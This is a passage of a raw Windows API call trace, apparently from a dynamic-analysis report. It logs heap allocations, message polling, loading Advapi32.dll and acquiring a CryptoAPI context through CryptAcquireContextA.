0x4391af0 [0103.205] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.205] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0103.206] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.207] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.207] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.207] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0103.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0103.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0103.208] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.208] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0103.209] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.209] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0103.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.210] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0103.213] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0103.213] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.214] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 